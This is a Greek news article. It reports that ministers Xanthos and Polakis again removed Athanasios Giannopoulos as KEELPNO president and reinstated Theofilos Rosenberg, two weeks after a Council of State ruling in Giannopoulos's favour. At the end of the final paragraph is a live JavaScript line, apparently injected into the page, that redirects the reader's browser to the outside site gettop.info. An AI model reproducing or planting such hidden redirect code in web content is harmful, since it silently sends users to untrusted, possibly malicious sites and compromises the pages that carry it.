«Μύλος» στο ΚΕΕΛΠΝΟ-Πολάκης και Ξανθός ξανακαρατόμησαν τον Γιαννόπουλο

0
12

 

Δύο εβδομάδες μετά την απόφαση-δικαίωση του Συμβουλίου της Επικρατείας, σύμφωνα με την οποία ακυρωνόντουσαν ως αντισυνταγματικές και παράνομες οι αναγκαστικές παραιτήσεις του προέδρου και δύο μελών του Διοικητικού Συμβουλίου του ΚΕΕΛΠΝΟ, ο υπουργός Υγείας Ανδρέας Ξανθός και ο αναπληρωτής υπουργός Παύλος Πολάκης απομάκρυναν εκ νέου τον Αθανάσιο Γιαννόπουλο και τοποθέτησαν στη θέση του προέδρου και πάλι τον Θεόφιλο Ρόζενμπεργκ.

Το μεσημέρι αναρτήθηκε στη Διαύγεια η υπουργική απόφαση με την οποία τοποθετείται και πάλι στη θέση του προέδρου του ΚΕΕΛΠΝΟ, ο Θεόφιλος Ρόζενμπεργκ ο οποίος είχε διαδεχτεί τον κ. Γιαννόπουλο μετά την αποπομπή του από τον Παύλο Πολάκη, μέσω Facebook, τον περασμένο Απρίλιο.

Είχε προηγηθεί την περασμένη Δευτέρα η κλήση σε ακρόαση του κ. Γιαννόπουλου από την ηγεσία του υπουργείου Υγείας προκειμένου να δώσει εξηγήσεις για την πλημμελή εκτέλεση των καθηκόντων του την οποία του «καταλόγιζε» η ηγεσία της Αριστοτέλους.

Όπως προκύπτει από την υπουργική απόφαση που συνυπογράφουν οι Ανδρέας Ξανθός και Παύλος Πολάκης, οι εξηγήσεις του κ. Γιαννόπουλου δεν έγιναν δεκτές.

Ο κ. Γιαννόπουλος τις τελευταίες δύο εβδομάδες, μετά την απόφαση του ΣτΕ, είχε εγκατασταθεί και πάλι στο γραφείο του προέδρου στο ΚΕΕΛΠΝΟ, πλην όμως ουδεμία απόφαση έλαβε καθώς, παρότι συγκαλούσε το ΔΣ σε συνεδρίαση, τα άλλα μέλη δεν προσερχόντουσαν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here